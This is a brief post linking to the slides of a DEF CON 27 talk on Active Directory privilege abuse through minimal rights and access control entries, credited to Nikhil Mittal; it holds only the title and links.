Slides of the DEF CON 27 talk:
RACE - Minimal Rights and ACE for Active Directory Dominance https://www.slideshare.net/nikhil_mi...tory-dominance from Nikhil Mittal https://www.slideshare.net/nikhil_mittal